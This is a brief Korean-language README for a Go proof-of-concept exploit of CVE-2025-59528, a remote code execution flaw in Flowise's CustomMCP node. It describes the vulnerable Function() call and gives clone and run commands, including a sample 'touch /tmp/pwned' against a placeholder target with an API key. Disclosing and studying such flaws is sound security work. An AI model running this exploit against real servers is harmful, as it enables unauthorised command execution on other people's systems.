
Go Proof of Concept (PoC) exploit for Flowise CustomMCP Remote Code Execution (RCE) CVE-2025-59528
CVE-2025-59528을 대상으로 한 Flowise 버전 <= 3.0.5에 대한 Go 기반 개념 증명입니다.
Flowise는 CustomMCP 노드 구성을 통해 검증되지 않은 JavaScript 실행을 허용합니다. 애플리케이션은 사용자가 제공한 입력을 mcpServerConfig 매개변수 내에서 백엔드 convertToValidJSONString 함수의 Function() 생성자로 직접 전달합니다. 이는 전체 Node.js 권한으로 코드를 평가하여 child_process를 통한 임의 시스템 명령 실행을 가능하게 합니다.
git clone https://github.com/Moon-Harvest/CVE-2025-59528
cd CVE-2025-59528/
go run main.go <target-base-url> <api-key> <command>
go run main.go http://target.com h3D_9jD7Xzi0V2KSrld9ff4P3rm6cuNXg1uA-wFsUYc "touch /tmp/pwned"